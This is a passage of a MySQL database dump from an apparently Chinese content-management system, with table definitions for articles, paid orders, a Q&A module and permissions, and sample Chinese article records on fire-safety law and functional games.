`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `news_id` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=54 DEFAULT CHARSET=utf8 COMMENT='资讯内容表_存储正常内容';
-- -----------------------------
-- Records of `ey_article_content`
-- -----------------------------
INSERT INTO `ey_article_content` VALUES ('9', '11', '<p>公众聚集场所的消防安全,历来是消防监督管理的重点。新消防法继承和发展了原消防法关于公安机关消防机构对公众聚集的场所在使用、营业前实施消防安全检查的规定,取消了原消防法中关于对公众聚集场所未经消防安全检查或者经检查不符合消防安全要求擅自投入使用、营业的行政处罚中,限期改正的前置条件,对存在上述违法行为的,规定了直接给予责令停止施工、停止使用、停产停业和罚款的行政处罚。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;举办大型群众性活动消防安全有要求</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;为减少行政许可事项,新消防法将大型群众性活动的消防安全纳入《大型群众性活动安全管理条例》规定的治安行政许可审查内容,避免了多头审批,方便社会,方便群众,同时明确了消防安全要求,规定举办大型群众性活动,承办人应当依法向公安机关申请安全许可,制定灭火和应急疏散预案并组织演练,明确消防安全责任分工,确定消防安全管理人员,保持消防设施和消防器材配置齐全、完好有效,保证疏散通道、安全出口、疏散指示标志、应急照明和消防车通道符合消防技术标准和管理规定。</p><p><br/></p>', '', '1533546369', '1534497406');
INSERT INTO `ey_article_content` VALUES ('31', '34', '<p> 自世纪之交以来,网络游戏及其所依托的网络文艺,作为移动互联网时代新兴媒介的文化娱乐形态,在全世界方兴未艾。2017年,我国网络游戏用户整体规模已有5亿左右,在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元,相当于全球电影票房的总和。</p><p> 需要指出的是,一般网民的网络游戏概念基本上停留在消遣娱乐的刻板化印象上。但实际上,网络游戏的内在构成已经有了相当程度的发展,有着丰富的内涵。例如,功能游戏是网络游戏一个极为重要的组成部分,是以解决社会和行业问题为主要目的的游戏类型,但其在主流视野中却鲜为人知</p><p><br/></p>', '', '1534242157', '1534493286');
INSERT INTO `ey_article_content` VALUES ('10', '12', '<p> 开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。</p>', '', '1535532129', '1535532129');
INSERT INTO `ey_article_content` VALUES ('11', '13', '<p>市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。</p>', '', '1533547487', '1534497391');
INSERT INTO `ey_article_content` VALUES ('12', '14', '<p><span style="color: rgb(51, 51, 51); font-family: arial; text-align: justify; background-color: rgb(255, 255, 255);">自世纪之交以来,网络游戏及其所依托的网络文艺,作为移动互联网时代新兴媒介的文化娱乐形态,在全世界方兴未艾。2017年,我国网络游戏用户整体规模已有5亿左右,在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元,相当于全球电影票房的总和。</span></p>', '', '1533547565', '1534497384');
INSERT INTO `ey_article_content` VALUES ('26', '29', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/92ad6537dda6a06ed4347e57490b0910.jpg" title="92ad6537dda6a06ed4347e57490b0910.jpg" alt="92ad6537dda6a06ed4347e57490b0910.jpg"/></p><p><br/></p><p style="text-align: center;"> 需要指出的是,一般网民的网络游戏概念基本上停留在消遣娱乐的刻板化印象上。但实际上,网络游戏的内在构成已经有了相当程度的发展,有着丰富的内涵。例如,功能游戏是网络游戏一个极为重要的组成部分,是以解决社会和行业问题为主要目的的游戏类型,但其在主流视野中却鲜为人知。</p><p style="text-align: center;"> 1994年,基于海湾战争的经验,美国海军陆战队成立了世界上第一个功能游戏军事训练机构,将功能游戏作为军队模拟训练的辅助手段。经过互联网领域在世纪之交的爆炸式发展,2006年之后,功能游戏逐渐拓展到了民用领域,在教育、医疗、交通、应急管理、环境保护、企业管理、文化传承等方面发挥了重要作用,为很多国家的政府部门、社会机构解决社会公共生活的各类难题,提供了不可替代的治理演练和经验。</p><p><br/></p>', '', '1534155569', '1534584988');
INSERT INTO `ey_article_content` VALUES ('20', '22', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/f92a4618e6c60d69bf67fb77803c4631.jpg" title="f92a4618e6c60d69bf67fb77803c4631.jpg" alt="f92a4618e6c60d69bf67fb77803c4631.jpg"/></p><p style="text-align: center;">开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。</p>', '', '1533627969', '1534585056');
INSERT INTO `ey_article_content` VALUES ('48', '51', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/103a6c19992526fe37fc7e9270c319c7.jpg" title="103a6c19992526fe37fc7e9270c319c7.jpg" alt="103a6c19992526fe37fc7e9270c319c7.jpg"/></p><p style="text-align: center;"> 自世纪之交以来,网络游戏及其所依托的网络文艺,作为移动互联网时代新兴媒介的文化娱乐形态,在全世界方兴未艾。2017年,我国网络游戏用户整体规模已有5亿左右,在全部网民中的占比接近7成。我国网络游戏行业整体营收达2189.6亿元,相当于全球电影票房的总和。</p><p style="text-align: center;"> 需要指出的是,一般网民的网络游戏概念基本上停留在消遣娱乐的刻板化印象上。但实际上,网络游戏的内在构成已经有了相当程度的发展,有着丰富的内涵。例如,功能游戏是网络游戏一个极为重要的组成部分,是以解决社会和行业问题为主要目的的游戏类型,但其在主流视野中却鲜为人知。</p><p style="text-align: center;"> 1994年,基于海湾战争的经验,美国海军陆战队成立了世界上第一个功能游戏军事训练机构,将功能游戏作为军队模拟训练的辅助手段。经过互联网领域在世纪之交的爆炸式发展,2006年之后,功能游戏逐渐拓展到了民用领域,在教育、医疗、交通、应急管理、环境保护、企业管理、文化传承等方面发挥了重要作用,为很多国家的政府部门、社会机构解决社会公共生活的各类难题,提供了不可替代的治理演练和经验。</p><p><br/></p>', '', '1534491071', '1534584966');
INSERT INTO `ey_article_content` VALUES ('49', '52', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/2180bd10694c65709d5b846720c2b816.jpg" title="2180bd10694c65709d5b846720c2b816.jpg" alt="2180bd10694c65709d5b846720c2b816.jpg"/></p><p style="text-align: center;">未来几年,功能游戏将有两位数的年均复合增长率,市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。</p>', '', '1534491102', '1534584940');
INSERT INTO `ey_article_content` VALUES ('50', '53', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/f440af2ad3998065606e0caaaef9d311.jpg" title="f440af2ad3998065606e0caaaef9d311.jpg" alt="f440af2ad3998065606e0caaaef9d311.jpg"/></p><p style="text-align: center;">以网络游戏为代表的网络文艺治理,已经构成我们无法回避的时代性挑战。动员政府部门、专家学者、行业企业、游戏用户和社会媒体等多方力量的广泛参与,开展对包括功能游戏在内的不同类型网络游戏的评论、批评,科学认识和评价网络游戏的复合价值,激浊扬清,发掘游戏文化中的优秀内容,加强价值引导和舆论监督,规范网络游戏经营行为,建立和完善立足于我国国情的网络游戏作品评价体系,进而最终完成我国网络游戏全行业的转型升级,促进我国以网络游戏为代表的网络文艺的健康发展,其重大意义就不仅仅局限于网络游戏行业本身,其对于我国网络文艺乃至整体性文化产业格局的转型升级,都将产生示范和引领作用。</p>', '', '1534491152', '1534584922');
INSERT INTO `ey_article_content` VALUES ('51', '54', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/f56fa5203d3f26f4737152c2456ad92e.jpg" title="f56fa5203d3f26f4737152c2456ad92e.jpg" alt="f56fa5203d3f26f4737152c2456ad92e.jpg"/></p><p style="text-align: center;"> 开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。</p>', '', '1534491184', '1534584897');
INSERT INTO `ey_article_content` VALUES ('25', '28', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/cdfc64e6554748f11219d9da4d8359de.jpg" title="cdfc64e6554748f11219d9da4d8359de.jpg" alt="cdfc64e6554748f11219d9da4d8359de.jpg"/></p><p style="text-align: center;">未来几年,功能游戏将有两位数的年均复合增长率,市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。</p>', '', '1534155527', '1534585010');
INSERT INTO `ey_article_content` VALUES ('21', '23', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/6e3d812ecf3975306f3b470cb9e6e5b0.jpg" title="6e3d812ecf3975306f3b470cb9e6e5b0.jpg" alt="6e3d812ecf3975306f3b470cb9e6e5b0.jpg"/></p><p style="text-align: center;">1994年,基于海湾战争的经验,美国海军陆战队成立了世界上第一个功能游戏军事训练机构,将功能游戏作为军队模拟训练的辅助手段。经过互联网领域在世纪之交的爆炸式发展,2006年之后,功能游戏逐渐拓展到了民用领域,在教育、医疗、交通、应急管理、环境保护、企业管理、文化传承等方面发挥了重要作用,为很多国家的政府部门、社会机构解决社会公共生活的各类难题,提供了不可替代的治理演练和经验。</p>', '', '1533628002', '1534585035');
INSERT INTO `ey_article_content` VALUES ('47', '50', '<p style="text-align:center"><img src="/public/upload/article/2018/08/18/3b60112e4c0db75f914d76c3e514c7bc.jpg" title="3b60112e4c0db75f914d76c3e514c7bc.jpg" alt="3b60112e4c0db75f914d76c3e514c7bc.jpg"/></p>', '', '1534490623', '1534584661');
INSERT INTO `ey_article_content` VALUES ('46', '49', '<p style="text-align: center;"><img src="/public/upload/article/2018/08/18/60741fa39741a56bd798f3008a0514e1.jpg" title="60741fa39741a56bd798f3008a0514e1.jpg" alt="60741fa39741a56bd798f3008a0514e1.jpg"/></p>', '', '1534490511', '1534584703');
INSERT INTO `ey_article_content` VALUES ('45', '48', '<p style="text-align:center"><img src="/public/upload/article/2018/08/18/7e7da58da302efe111243d436d6212fa.jpg" title="7e7da58da302efe111243d436d6212fa.jpg" alt="7e7da58da302efe111243d436d6212fa.jpg"/></p>', '', '1534473824', '1534584735');
INSERT INTO `ey_article_content` VALUES ('44', '47', '<p style="text-align:center"><img src="/public/upload/article/2018/08/18/b606866e3714255c14e79481645e4151.jpg" title="b606866e3714255c14e79481645e4151.jpg" alt="b606866e3714255c14e79481645e4151.jpg"/></p>', '', '1534473672', '1534584755');
INSERT INTO `ey_article_content` VALUES ('41', '44', '<p>动员政府部门、专家学者、行业企业、游戏用户和社会媒体等多方力量的广泛参与,开展对包括功能游戏在内的不同类型网络游戏的评论、批评,科学认识和评价网络游戏的复合价值,激浊扬清,发掘游戏文化中的优秀内容,加强价值引导和舆论监督,规范网络游戏经营行为,建立和完善立足于我国国情的网络游戏作品评价体系,进而最终完成我国网络游戏全行业的转型升级,促进我国以网络游戏为代表的网络文艺的健康发展,其重大意义就不仅仅局限于网络游戏行业本身,其对于我国网络文艺乃至整体性文化产业格局的转型升级,都将产生示范和引领作用。</p>', '', '1535532139', '1535532139');
INSERT INTO `ey_article_content` VALUES ('42', '45', '<p> 开发功能性游戏,对在全球网络游戏市场份额占比近10%的腾讯来说,显然是一个重要节点,对全行业也有积极影响。但是,对我国这一全球最大的网络游戏市场而言,对不断加大走出去力度的众多中国互联网企业而言,这仅仅是漫长征程的第一步。开发出更多可以服务具体应用目的和应用场景的,具有正面主流价值的功能游戏,应当成为全行业的共识。因为,这绝不仅仅关乎企业自身的商业利益,对于改变当前社会上对网络游戏的一些片面认识,促进网络游戏全行业的转型升级,更是有着重要意义。</p>', '', '1535503482', '1535503482');
INSERT INTO `ey_article_content` VALUES ('43', '46', '<p> 未来几年,功能游戏将有两位数的年均复合增长率,市场规模将迅速增长到300亿元到500亿元,其广阔的发展前景和深远影响更将远远超过其商业价值。在可预见的将来,功能游戏还将进一步主流化,成为主流社会日常性的互联网应用工具。过去几年,我国出现了《韩熙载夜宴图》《每日故宫》《紫禁城祥瑞》《皇帝的一天》以及《榫卯》《折扇》等和传统文化深入融合的功能游戏精品佳作,但就我国网络游戏行业的实际发展情况而言,在功能游戏领域,我们只是刚刚起步。</p>', '', '1535503467', '1535503467');
-- -----------------------------
-- Table structure for `ey_article_order`
-- -----------------------------
DROP TABLE IF EXISTS `ey_article_order`;
CREATE TABLE `ey_article_order` (
`order_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '文章订单ID',
`order_code` varchar(50) NOT NULL DEFAULT '' COMMENT '媒体订单编号',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`order_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '订单状态:0未付款,1已付款',
`order_amount` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '订单应付总金额',
`pay_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '支付时间',
`pay_name` varchar(20) NOT NULL DEFAULT '' COMMENT '支付方式名称',
`wechat_pay_type` varchar(20) NOT NULL DEFAULT '' COMMENT '微信支付时,标记使用的支付类型(扫码支付,微信内部,微信H5页面)',
`pay_details` text COMMENT '支付时返回的数据,以serialize序列化后存入,用于后续查询。',
`product_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '视频文档ID',
`product_name` varchar(100) DEFAULT '' COMMENT '视频文档名称',
`product_litpic` varchar(500) DEFAULT '' COMMENT '视频文档封面图片',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '下单时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`order_id`),
UNIQUE KEY `order_code` (`order_code`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='文章订单表';
-- -----------------------------
-- Table structure for `ey_article_pay`
-- -----------------------------
DROP TABLE IF EXISTS `ey_article_pay`;
CREATE TABLE `ey_article_pay` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`aid` int(11) DEFAULT '0',
`part_free` tinyint(1) DEFAULT '0' COMMENT '是否试看 0-否 1-是',
`size` float(10,2) DEFAULT '1.00' COMMENT 'KB',
`free_content` longtext COMMENT '试看内容',
`add_time` int(11) DEFAULT '0',
`update_time` int(11) DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='文章付费预览表';
-- -----------------------------
-- Table structure for `ey_ask`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ask`;
CREATE TABLE `ey_ask` (
`ask_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`type_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题栏目ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`ask_title` varchar(200) NOT NULL DEFAULT '' COMMENT '问题标题',
`is_recom` tinyint(1) NOT NULL DEFAULT '0' COMMENT '问题是否推荐',
`status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '问题状态:0未解决,1已解决,2已关闭',
`click` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '浏览点击量',
`replies` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题回复量',
`content` text NOT NULL COMMENT '问题内容',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '问题网址',
`users_ip` varchar(50) NOT NULL DEFAULT '' COMMENT '问题发布时IP地址',
`is_review` tinyint(1) NOT NULL DEFAULT '1' COMMENT '问题是否审核,1是,0否',
`follow` tinyint(1) NOT NULL DEFAULT '0' COMMENT '关注问题则表示有回复时发送邮件通知到问题发布人',
`solve_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '解决时间(这个问题存在最佳答案则表示已解决)',
`bestanswer_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '最佳答案',
`sort_order` int(10) NOT NULL DEFAULT '100' COMMENT '排序号',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`money` decimal(8,2) NOT NULL DEFAULT '0.00' COMMENT '悬赏金额',
`is_del` tinyint(1) DEFAULT '0' COMMENT '1-删除',
PRIMARY KEY (`ask_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='问题表';
-- -----------------------------
-- Table structure for `ey_ask_answer`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ask_answer`;
CREATE TABLE `ey_ask_answer` (
`answer_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`ask_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题ID',
`is_bestanswer` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否最佳答案,0否,1是',
`is_review` tinyint(1) NOT NULL DEFAULT '1' COMMENT '问题是否审核,1是,0否',
`type_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题栏目ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`username` varchar(50) NOT NULL DEFAULT '' COMMENT '用户名',
`click_like` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞量',
`users_ip` varchar(30) NOT NULL DEFAULT '' COMMENT '用户IP地址',
`content` text NOT NULL COMMENT '内容',
`ifcheck` tinyint(1) NOT NULL DEFAULT '1',
`answer_pid` int(10) NOT NULL DEFAULT '0' COMMENT '子答案的父答案',
`at_users_id` int(10) NOT NULL DEFAULT '0' COMMENT '被@的用户ID',
`at_answer_id` int(10) NOT NULL DEFAULT '0' COMMENT '@答案ID',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`is_del` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1-删除',
PRIMARY KEY (`answer_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='答案表';
-- -----------------------------
-- Table structure for `ey_ask_answer_like`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ask_answer_like`;
CREATE TABLE `ey_ask_answer_like` (
`like_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`ask_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题ID',
`answer_id` int(10) NOT NULL DEFAULT '0' COMMENT '答案ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`click_like` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞',
`like_source` tinyint(1) unsigned NOT NULL DEFAULT '2' COMMENT '点赞来源,1=点赞提问(ask_id),2=点赞评论(answer_id),3=点赞回复(answer_id),默认值为2,兼容以前的那些评论数据',
`users_ip` varchar(30) NOT NULL DEFAULT '' COMMENT '用户IP地址',
`add_time` int(10) unsigned NOT NULL DEFAULT '0',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`like_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='答案点赞表';
-- -----------------------------
-- Table structure for `ey_ask_score_level`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ask_score_level`;
CREATE TABLE `ey_ask_score_level` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(55) DEFAULT '',
`min` mediumint(8) DEFAULT '0',
`max` mediumint(8) DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='积分等级表';
-- -----------------------------
-- Records of `ey_ask_score_level`
-- -----------------------------
INSERT INTO `ey_ask_score_level` VALUES ('1', '青铜', '0', '1000');
INSERT INTO `ey_ask_score_level` VALUES ('2', '白银', '1001', '5000');
INSERT INTO `ey_ask_score_level` VALUES ('3', '黄金', '5001', '20000');
INSERT INTO `ey_ask_score_level` VALUES ('4', '王者', '20001', '0');
-- -----------------------------
-- Table structure for `ey_ask_type`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ask_type`;
CREATE TABLE `ey_ask_type` (
`type_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '栏目自增',
`type_name` varchar(100) NOT NULL DEFAULT '' COMMENT '栏目名称',
`parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '上级ID',
`seo_title` varchar(200) DEFAULT '' COMMENT 'SEO标题',
`seo_keywords` varchar(200) DEFAULT '' COMMENT 'seo关键字',
`seo_description` text COMMENT 'seo描述',
`sort_order` int(10) unsigned NOT NULL DEFAULT '100' COMMENT '排序号',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`type_id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COMMENT='问题栏目分类表';
-- -----------------------------
-- Records of `ey_ask_type`
-- -----------------------------
INSERT INTO `ey_ask_type` VALUES ('1', '问题求助', '0', '', '', '', '100', '1565770890', '1611910466');
INSERT INTO `ey_ask_type` VALUES ('2', '功能建议', '0', '', '', '', '100', '1565770890', '1611910466');
INSERT INTO `ey_ask_type` VALUES ('3', 'BUG反馈', '1', '', '', '', '100', '1565771021', '1611910466');
INSERT INTO `ey_ask_type` VALUES ('4', '其他问题', '1', '', '', '', '100', '1565771021', '1611910466');
INSERT INTO `ey_ask_type` VALUES ('5', '业务咨询', '0', '', '', '', '100', '1611910466', '1611910466');
-- -----------------------------
-- Table structure for `ey_auth_access`
-- -----------------------------
DROP TABLE IF EXISTS `ey_auth_access`;
CREATE TABLE `ey_auth_access` (
`role_id` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '角色ID',
`rule_id` int(11) NOT NULL DEFAULT '0' COMMENT '权限ID',
KEY `role_id` (`role_id`) USING BTREE,
KEY `rule_id` (`rule_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='权限授权表';
-- -----------------------------
-- Records of `ey_auth_access`
-- -----------------------------
INSERT INTO `ey_auth_access` VALUES ('12', '176');
INSERT INTO `ey_auth_access` VALUES ('12', '177');
INSERT INTO `ey_auth_access` VALUES ('12', '178');
INSERT INTO `ey_auth_access` VALUES ('12', '179');
INSERT INTO `ey_auth_access` VALUES ('12', '180');
INSERT INTO `ey_auth_access` VALUES ('12', '181');
INSERT INTO `ey_auth_access` VALUES ('12', '182');
INSERT INTO `ey_auth_access` VALUES ('12', '183');
INSERT INTO `ey_auth_access` VALUES ('12', '184');
INSERT INTO `ey_auth_access` VALUES ('12', '185');
INSERT INTO `ey_auth_access` VALUES ('12', '186');
INSERT INTO `ey_auth_access` VALUES ('12', '187');
INSERT INTO `ey_auth_access` VALUES ('12', '188');
INSERT INTO `ey_auth_access` VALUES ('12', '189');
INSERT INTO `ey_auth_access` VALUES ('12', '190');
INSERT INTO `ey_auth_access` VALUES ('12', '191');
INSERT INTO `ey_auth_access` VALUES ('12', '192');
INSERT INTO `ey_auth_access` VALUES ('12', '193');
INSERT INTO `ey_auth_access` VALUES ('12', '194');
INSERT INTO `ey_auth_access` VALUES ('12', '195');
INSERT INTO `ey_auth_access` VALUES ('12', '196');
INSERT INTO `ey_auth_access` VALUES ('12', '197');
INSERT INTO `ey_auth_access` VALUES ('12', '198');
INSERT INTO `ey_auth_access` VALUES ('12', '81');
INSERT INTO `ey_auth_access` VALUES ('12', '62');
INSERT INTO `ey_auth_access` VALUES ('12', '61');
INSERT INTO `ey_auth_access` VALUES ('12', '8');
INSERT INTO `ey_auth_access` VALUES ('12', '70');
INSERT INTO `ey_auth_access` VALUES ('12', '71');
INSERT INTO `ey_auth_access` VALUES ('12', '72');
INSERT INTO `ey_auth_access` VALUES ('11', '176');
INSERT INTO `ey_auth_access` VALUES ('11', '177');
INSERT INTO `ey_auth_access` VALUES ('11', '178');
INSERT INTO `ey_auth_access` VALUES ('11', '179');
INSERT INTO `ey_auth_access` VALUES ('11', '180');
INSERT INTO `ey_auth_access` VALUES ('11', '181');
INSERT INTO `ey_auth_access` VALUES ('11', '182');
INSERT INTO `ey_auth_access` VALUES ('11', '184');
INSERT INTO `ey_auth_access` VALUES ('11', '185');
INSERT INTO `ey_auth_access` VALUES ('11', '186');
INSERT INTO `ey_auth_access` VALUES ('11', '187');
INSERT INTO `ey_auth_access` VALUES ('11', '188');
INSERT INTO `ey_auth_access` VALUES ('11', '189');
INSERT INTO `ey_auth_access` VALUES ('11', '191');
INSERT INTO `ey_auth_access` VALUES ('11', '192');
INSERT INTO `ey_auth_access` VALUES ('11', '193');
INSERT INTO `ey_auth_access` VALUES ('11', '194');
INSERT INTO `ey_auth_access` VALUES ('11', '195');
INSERT INTO `ey_auth_access` VALUES ('11', '196');
INSERT INTO `ey_auth_access` VALUES ('11', '197');
INSERT INTO `ey_auth_access` VALUES ('11', '198');
INSERT INTO `ey_auth_access` VALUES ('11', '199');
INSERT INTO `ey_auth_access` VALUES ('11', '200');
INSERT INTO `ey_auth_access` VALUES ('11', '201');
INSERT INTO `ey_auth_access` VALUES ('11', '202');
INSERT INTO `ey_auth_access` VALUES ('11', '203');
INSERT INTO `ey_auth_access` VALUES ('11', '204');
INSERT INTO `ey_auth_access` VALUES ('11', '205');
INSERT INTO `ey_auth_access` VALUES ('11', '206');
INSERT INTO `ey_auth_access` VALUES ('11', '207');
INSERT INTO `ey_auth_access` VALUES ('11', '208');
INSERT INTO `ey_auth_access` VALUES ('11', '209');
INSERT INTO `ey_auth_access` VALUES ('11', '210');
INSERT INTO `ey_auth_access` VALUES ('11', '211');
INSERT INTO `ey_auth_access` VALUES ('11', '125');
INSERT INTO `ey_auth_access` VALUES ('11', '126');
INSERT INTO `ey_auth_access` VALUES ('11', '127');
INSERT INTO `ey_auth_access` VALUES ('11', '62');
INSERT INTO `ey_auth_access` VALUES ('11', '136');
INSERT INTO `ey_auth_access` VALUES ('11', '137');
INSERT INTO `ey_auth_access` VALUES ('11', '138');
INSERT INTO `ey_auth_access` VALUES ('11', '139');
INSERT INTO `ey_auth_access` VALUES ('11', '140');
INSERT INTO `ey_auth_access` VALUES ('11', '141');
INSERT INTO `ey_auth_access` VALUES ('11', '142');
INSERT INTO `ey_auth_access` VALUES ('11', '143');
INSERT INTO `ey_auth_access` VALUES ('11', '61');
INSERT INTO `ey_auth_access` VALUES ('11', '212');
INSERT INTO `ey_auth_access` VALUES ('11', '8');
INSERT INTO `ey_auth_access` VALUES ('11', '70');
INSERT INTO `ey_auth_access` VALUES ('11', '71');
INSERT INTO `ey_auth_access` VALUES ('11', '72');
INSERT INTO `ey_auth_access` VALUES ('11', '9');
INSERT INTO `ey_auth_access` VALUES ('11', '77');
INSERT INTO `ey_auth_access` VALUES ('11', '78');
INSERT INTO `ey_auth_access` VALUES ('11', '79');
INSERT INTO `ey_auth_access` VALUES ('11', '148');
INSERT INTO `ey_auth_access` VALUES ('11', '149');
INSERT INTO `ey_auth_access` VALUES ('11', '150');
INSERT INTO `ey_auth_access` VALUES ('11', '151');
INSERT INTO `ey_auth_access` VALUES ('11', '144');
INSERT INTO `ey_auth_access` VALUES ('11', '145');
INSERT INTO `ey_auth_access` VALUES ('11', '146');
INSERT INTO `ey_auth_access` VALUES ('11', '147');
INSERT INTO `ey_auth_access` VALUES ('11', '155');
INSERT INTO `ey_auth_access` VALUES ('11', '156');
INSERT INTO `ey_auth_access` VALUES ('11', '157');
INSERT INTO `ey_auth_access` VALUES ('11', '158');
INSERT INTO `ey_auth_access` VALUES ('11', '159');
-- -----------------------------
-- Table structure for `ey_auth_modular`
-- -----------------------------
DROP TABLE IF EXISTS `ey_auth_modular`;
CREATE TABLE `ey_auth_modular` (
`id` int(11) NOT NULL AUTO_INCREMENT,
